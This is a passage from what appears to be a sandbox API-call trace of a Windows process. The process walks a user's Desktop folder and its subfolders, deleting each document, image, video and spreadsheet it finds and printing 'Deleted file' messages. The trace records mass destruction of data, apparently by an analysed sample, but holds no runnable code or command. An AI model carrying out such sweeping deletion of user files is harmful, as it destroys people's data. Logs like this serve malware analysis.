lpConsoleScreenBufferInfo=0x3ee2c8) returned 1 [0064.123] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.123] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee308 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\1VyHqT6C0o53edILQ.xls\r\n") returned 0x56 [0064.123] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x56, lpNumberOfCharsWritten=0x3ee2ec, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee2ec*=0x56) returned 1 [0064.125] FindNextFileW (in: hFindFile=0x7c3000, lpFindFileData=0x7c8ba4 | out: lpFindFileData=0x7c8ba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0e9bba0, ftCreationTime.dwHighDateTime=0x1d5dee8, ftLastAccessTime.dwLowDateTime=0x7737fd00, ftLastAccessTime.dwHighDateTime=0x1d5e2df, ftLastWriteTime.dwLowDateTime=0x7737fd00, ftLastWriteTime.dwHighDateTime=0x1d5e2df, nFileSizeHigh=0x0, nFileSizeLow=0x4021, dwReserved0=0x0, dwReserved1=0x0, cFileName="KYMLAaYO.ots", cAlternateFileName="")) returned 1 [0064.125] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\KYMLAaYO.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\kymlaayo.ots")) returned 1 [0064.126] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.126] GetFileType (hFile=0x7) returned 0x2 [0064.127] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.127] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee294 | out: lpMode=0x3ee294) returned 1 [0064.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.127] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee2c8 | out: lpConsoleScreenBufferInfo=0x3ee2c8) returned 1 [0064.127] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.127] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee308 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\KYMLAaYO.ots\r\n") returned 0x4d [0064.128] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x4d, lpNumberOfCharsWritten=0x3ee2ec, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee2ec*=0x4d) returned 1 [0064.128] FindNextFileW (in: hFindFile=0x7c3000, lpFindFileData=0x7c8ba4 | out: lpFindFileData=0x7c8ba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x638848c0, ftCreationTime.dwHighDateTime=0x1d5e337, ftLastAccessTime.dwLowDateTime=0xd22e0550, ftLastAccessTime.dwHighDateTime=0x1d5d8d6, ftLastWriteTime.dwLowDateTime=0xd22e0550, ftLastWriteTime.dwHighDateTime=0x1d5d8d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PYHaTu2SZet-4", cAlternateFileName="PYHATU~1")) returned 1 [0064.129] FindNextFileW (in: hFindFile=0x7c3000, lpFindFileData=0x7c8ba4 | out: lpFindFileData=0x7c8ba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b4dd90, ftCreationTime.dwHighDateTime=0x1d5dad6, ftLastAccessTime.dwLowDateTime=0x691c2820, ftLastAccessTime.dwHighDateTime=0x1d5db2a, ftLastWriteTime.dwLowDateTime=0x691c2820, ftLastWriteTime.dwHighDateTime=0x1d5db2a, nFileSizeHigh=0x0, nFileSizeLow=0x8241, dwReserved0=0x0, dwReserved1=0x0, cFileName="q4vqwq7Oz6niAh.png", cAlternateFileName="Q4VQWQ~1.PNG")) returned 1 [0064.129] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\q4vqwq7Oz6niAh.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\q4vqwq7oz6niah.png")) returned 1 [0064.131] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.131] GetFileType (hFile=0x7) returned 0x2 [0064.131] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.131] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee294 | out: lpMode=0x3ee294) returned 1 [0064.132] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.132] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee2c8 | out: lpConsoleScreenBufferInfo=0x3ee2c8) returned 1 [0064.132] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.132] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee308 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\q4vqwq7Oz6niAh.png\r\n") returned 0x53 [0064.132] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x53, lpNumberOfCharsWritten=0x3ee2ec, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee2ec*=0x53) returned 1 [0064.133] FindNextFileW (in: hFindFile=0x7c3000, lpFindFileData=0x7c8ba4 | out: lpFindFileData=0x7c8ba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a31c400, ftCreationTime.dwHighDateTime=0x1d5e23a, ftLastAccessTime.dwLowDateTime=0xf7fe6ad0, ftLastAccessTime.dwHighDateTime=0x1d5da12, ftLastWriteTime.dwLowDateTime=0xf7fe6ad0, ftLastWriteTime.dwHighDateTime=0x1d5da12, nFileSizeHigh=0x0, nFileSizeLow=0x17051, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rg_8VLCBiVD.csv", cAlternateFileName="RG_8VL~1.CSV")) returned 1 [0064.134] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Rg_8VLCBiVD.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\rg_8vlcbivd.csv")) returned 1 [0064.136] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.136] GetFileType (hFile=0x7) returned 0x2 [0064.137] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.137] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee294 | out: lpMode=0x3ee294) returned 1 [0064.138] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.138] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee2c8 | out: lpConsoleScreenBufferInfo=0x3ee2c8) returned 1 [0064.138] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.138] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee308 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Rg_8VLCBiVD.csv\r\n") returned 0x50 [0064.138] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x50, lpNumberOfCharsWritten=0x3ee2ec, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee2ec*=0x50) returned 1 [0064.139] FindNextFileW (in: hFindFile=0x7c3000, lpFindFileData=0x7c8ba4 | out: lpFindFileData=0x7c8ba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe759f710, ftCreationTime.dwHighDateTime=0x1d5e7d9, ftLastAccessTime.dwLowDateTime=0x53644130, ftLastAccessTime.dwHighDateTime=0x1d5e36c, ftLastWriteTime.dwLowDateTime=0x53644130, ftLastWriteTime.dwHighDateTime=0x1d5e36c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vh5MbuS", cAlternateFileName="")) returned 1 [0064.139] FindNextFileW (in: hFindFile=0x7c3000, lpFindFileData=0x7c8ba4 | out: lpFindFileData=0x7c8ba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe759f710, ftCreationTime.dwHighDateTime=0x1d5e7d9, ftLastAccessTime.dwLowDateTime=0x53644130, ftLastAccessTime.dwHighDateTime=0x1d5e36c, ftLastWriteTime.dwLowDateTime=0x53644130, ftLastWriteTime.dwHighDateTime=0x1d5e36c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vh5MbuS", cAlternateFileName="")) returned 0 [0064.139] GetLastError () returned 0x12 [0064.139] FindClose (in: hFindFile=0x7c3000 | out: hFindFile=0x7c3000) returned 1 [0064.140] GetProcessHeap () returned 0x7b0000 [0064.140] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c8b98 | out: hHeap=0x7b0000) returned 1 [0064.140] GetProcessHeap () returned 0x7b0000 [0064.140] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x68) returned 0x7c3000 [0064.140] GetProcessHeap () returned 0x7b0000 [0064.140] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x18) returned 0x7c47a8 [0064.140] GetProcessHeap () returned 0x7b0000 [0064.140] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x68) returned 0x7c3070 [0064.140] GetProcessHeap () returned 0x7b0000 [0064.141] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x808) returned 0x7c8b98 [0064.141] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\*", fInfoLevelId=0x0, lpFindFileData=0x7c8ba4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x7c8ba4) returned 0x7c30e0 [0064.141] FindNextFileW (in: hFindFile=0x7c30e0, lpFindFileData=0x7c8bdc | out: lpFindFileData=0x7c8bdc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a308330, ftCreationTime.dwHighDateTime=0x1d5d7c0, ftLastAccessTime.dwLowDateTime=0x40b55e0, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x40b55e0, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.141] FindNextFileW (in: hFindFile=0x7c30e0, lpFindFileData=0x7c8c14 | out: lpFindFileData=0x7c8c14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x638848c0, ftCreationTime.dwHighDateTime=0x1d5e337, ftLastAccessTime.dwLowDateTime=0xd22e0550, ftLastAccessTime.dwHighDateTime=0x1d5d8d6, ftLastWriteTime.dwLowDateTime=0xd22e0550, ftLastWriteTime.dwHighDateTime=0x1d5d8d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PYHaTu2SZet-4", cAlternateFileName="PYHATU~1")) returned 1 [0064.141] FindNextFileW (in: hFindFile=0x7c30e0, lpFindFileData=0x7c8c74 | out: lpFindFileData=0x7c8c74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe759f710, ftCreationTime.dwHighDateTime=0x1d5e7d9, ftLastAccessTime.dwLowDateTime=0x53644130, ftLastAccessTime.dwHighDateTime=0x1d5e36c, ftLastWriteTime.dwLowDateTime=0x53644130, ftLastWriteTime.dwHighDateTime=0x1d5e36c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vh5MbuS", cAlternateFileName="")) returned 1 [0064.141] FindNextFileW (in: hFindFile=0x7c30e0, lpFindFileData=0x7c8cb8 | out: lpFindFileData=0x7c8cb8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0064.141] GetLastError () returned 0x12 [0064.141] FindClose (in: hFindFile=0x7c30e0 | out: hFindFile=0x7c30e0) returned 1 [0064.286] GetProcessHeap () returned 0x7b0000 [0064.286] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x18) returned 0x7c30e0 [0064.286] GetProcessHeap () returned 0x7b0000 [0064.286] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x84) returned 0x7c93a8 [0064.286] GetProcessHeap () returned 0x7b0000 [0064.286] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x808) returned 0x7de270 [0064.286] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHaTu2SZet-4\\*", fInfoLevelId=0x0, lpFindFileData=0x7de27c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x7de27c) returned 0x7c3100 [0064.287] FindNextFileW (in: hFindFile=0x7c3100, lpFindFileData=0x7de27c | out: lpFindFileData=0x7de27c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x638848c0, ftCreationTime.dwHighDateTime=0x1d5e337, ftLastAccessTime.dwLowDateTime=0xd22e0550, ftLastAccessTime.dwHighDateTime=0x1d5d8d6, ftLastWriteTime.dwLowDateTime=0xd22e0550, ftLastWriteTime.dwHighDateTime=0x1d5d8d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.288] FindNextFileW (in: hFindFile=0x7c3100, lpFindFileData=0x7de27c | out: lpFindFileData=0x7de27c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77694680, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0xfb79d6a0, ftLastAccessTime.dwHighDateTime=0x1d5db6a, ftLastWriteTime.dwLowDateTime=0xfb79d6a0, ftLastWriteTime.dwHighDateTime=0x1d5db6a, nFileSizeHigh=0x0, nFileSizeLow=0x902, dwReserved0=0x0, dwReserved1=0x0, cFileName="cJ6GjC62RolRRP.doc", cAlternateFileName="CJ6GJC~1.DOC")) returned 1 [0064.288] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHaTu2SZet-4\\cJ6GjC62RolRRP.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\pyhatu2szet-4\\cj6gjc62rolrrp.doc")) returned 1 [0069.506] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.506] GetFileType (hFile=0x7) returned 0x2 [0069.561] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.561] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee1ec | out: lpMode=0x3ee1ec) returned 1 [0069.603] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.603] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee220 | out: lpConsoleScreenBufferInfo=0x3ee220) returned 1 [0069.611] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0069.611] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee260 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHaTu2SZet-4\\cJ6GjC62RolRRP.doc\r\n") returned 0x61 [0069.611] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x61, lpNumberOfCharsWritten=0x3ee244, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee244*=0x61) returned 1 [0069.881] FindNextFileW (in: hFindFile=0x7c3100, lpFindFileData=0x7de27c | out: lpFindFileData=0x7de27c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x935f42b0, ftCreationTime.dwHighDateTime=0x1d5e198, ftLastAccessTime.dwLowDateTime=0x6ec8a050, ftLastAccessTime.dwHighDateTime=0x1d5df99, ftLastWriteTime.dwLowDateTime=0x6ec8a050, ftLastWriteTime.dwHighDateTime=0x1d5df99, nFileSizeHigh=0x0, nFileSizeLow=0x1384b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eiXFsUN1f.avi", cAlternateFileName="EIXFSU~1.AVI")) returned 1 [0069.881] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHaTu2SZet-4\\eiXFsUN1f.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\pyhatu2szet-4\\eixfsun1f.avi")) returned 1 [0069.881] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.881] GetFileType (hFile=0x7) returned 0x2 [0069.882] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.882] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee1ec | out: lpMode=0x3ee1ec) returned 1 [0069.882] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.883] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee220 | out: lpConsoleScreenBufferInfo=0x3ee220) returned 1 [0069.889] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0069.890] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee260 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHaTu2SZet-4\\eiXFsUN1f.avi\r\n") returned 0x5c [0069.890] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x5c, lpNumberOfCharsWritten=0x3ee244, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee244*=0x5c) returned 1 [0069.890] FindNextFileW (in: hFindFile=0x7c3100, lpFindFileData=0x7de27c | out: lpFindFileData=0x7de27c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14c9f390, ftCreationTime.dwHighDateTime=0x1d5e671, ftLastAccessTime.dwLowDateTime=0x9ca29d90, ftLastAccessTime.dwHighDateTime=0x1d5d86f, ftLastWriteTime.dwLowDateTime=0x9ca29d90, ftLastWriteTime.dwHighDateTime=0x1d5d86f, nFileSizeHigh=0x0, nFileSizeLow=0x185c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="HMZ8R.bmp", cAlternateFileName="")) returned 1 [0069.890] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHaTu2SZet-4\\HMZ8R.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\pyhatu2szet-4\\hmz8r.bmp")) returned 1 [0069.891] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.891] GetFileType (hFile=0x7) returned 0x2 [0069.892] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.892] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee1ec | out: lpMode=0x3ee1ec) returned 1 [0069.892] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.892] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee220 | out: lpConsoleScreenBufferInfo=0x3ee220) returned 1 [0069.892] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0069.892] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee260 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHaTu2SZet-4\\HMZ8R.bmp\r\n") returned 0x58 [0069.892] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x3ee244, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee244*=0x58) returned 1 [0069.893] FindNextFileW (in: hFindFile=0x7c3100, lpFindFileData=0x7de27c | out: lpFindFileData=0x7de27c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14c9f390, ftCreationTime.dwHighDateTime=0x1d5e671, ftLastAccessTime.dwLowDateTime=0x9ca29d90, ftLastAccessTime.dwHighDateTime=0x1d5d86f, ftLastWriteTime.dwLowDateTime=0x9ca29d90, ftLastWriteTime.dwHighDateTime=0x1d5d86f, nFileSizeHigh=0x0, nFileSizeLow=0x185c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="HMZ8R.bmp", cAlternateFileName="")) returned 0 [0069.894] GetLastError () returned 0x12 [0069.894] FindClose (in: hFindFile=0x7c3100 | out: hFindFile=0x7c3100) returned 1 [0069.894] GetProcessHeap () returned 0x7b0000 [0069.894] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7de270 | out: hHeap=0x7b0000) returned 1 [0069.894] GetProcessHeap () returned 0x7b0000 [0069.894] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x84) returned 0x7c9438 [0069.894] GetProcessHeap () returned 0x7b0000 [0069.894] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x18) returned 0x7c3100 [0069.894] GetProcessHeap () returned 0x7b0000 [0069.894] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x84) returned 0x7c94c8 [0069.894] GetProcessHeap () returned 0x7b0000 [0069.894] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x808) returned 0x7de270 [0069.894] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHaTu2SZet-4\\*", fInfoLevelId=0x0, lpFindFileData=0x7de27c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x7de27c) returned 0x7c9558 [0069.894] FindNextFileW (in: hFindFile=0x7c9558, lpFindFileData=0x7de2b4 | out: lpFindFileData=0x7de2b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x638848c0, ftCreationTime.dwHighDateTime=0x1d5e337, ftLastAccessTime.dwLowDateTime=0x7774fe0, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x7774fe0, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.894] FindNextFileW (in: hFindFile=0x7c9558, lpFindFileData=0x7de2ec | out: lpFindFileData=0x7de2ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0069.894] GetLastError () returned 0x12 [0069.894] FindClose (in: hFindFile=0x7c9558 | out: hFindFile=0x7c9558) returned 1 [0069.895] GetProcessHeap () returned 0x7b0000 [0069.895] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x10) returned 0x7c0350 [0069.895] GetProcessHeap () returned 0x7b0000 [0069.895] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c0350 | out: hHeap=0x7b0000) returned 1 [0069.895] GetProcessHeap () returned 0x7b0000 [0069.895] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7de270 | out: hHeap=0x7b0000) returned 1 [0069.895] GetProcessHeap () returned 0x7b0000 [0069.895] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c94c8 | out: hHeap=0x7b0000) returned 1 [0069.895] GetProcessHeap () returned 0x7b0000 [0069.895] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c3100 | out: hHeap=0x7b0000) returned 1 [0069.895] GetProcessHeap () returned 0x7b0000 [0069.895] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c9438 | out: hHeap=0x7b0000) returned 1 [0069.895] GetProcessHeap () returned 0x7b0000 [0069.895] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c93a8 | out: hHeap=0x7b0000) returned 1 [0069.895] GetProcessHeap () returned 0x7b0000 [0069.895] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x78) returned 0x7c6688 [0069.895] GetProcessHeap () returned 0x7b0000 [0069.895] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x808) returned 0x7de270 [0069.895] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS\\*", fInfoLevelId=0x0, lpFindFileData=0x7de27c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x7de27c) returned 0x7c3100 [0069.895] FindNextFileW (in: hFindFile=0x7c3100, lpFindFileData=0x7de27c | out: lpFindFileData=0x7de27c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe759f710, ftCreationTime.dwHighDateTime=0x1d5e7d9, ftLastAccessTime.dwLowDateTime=0x53644130, ftLastAccessTime.dwHighDateTime=0x1d5e36c, ftLastWriteTime.dwLowDateTime=0x53644130, ftLastWriteTime.dwHighDateTime=0x1d5e36c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.896] FindNextFileW (in: hFindFile=0x7c3100, lpFindFileData=0x7de27c | out: lpFindFileData=0x7de27c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77cea4e0, ftCreationTime.dwHighDateTime=0x1d5e004, ftLastAccessTime.dwLowDateTime=0xfe1ee190, ftLastAccessTime.dwHighDateTime=0x1d5d88e, ftLastWriteTime.dwLowDateTime=0xfe1ee190, ftLastWriteTime.dwHighDateTime=0x1d5d88e, nFileSizeHigh=0x0, nFileSizeLow=0xefbc, dwReserved0=0x0, dwReserved1=0x0, cFileName="3Ys6XUI1zSfF0RejyCi.pps", cAlternateFileName="3YS6XU~1.PPS")) returned 1 [0069.896] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS\\3Ys6XUI1zSfF0RejyCi.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\vh5mbus\\3ys6xui1zsff0rejyci.pps")) returned 1 [0069.896] _get_osfhandle (_FileHandle=1) returned 0x7 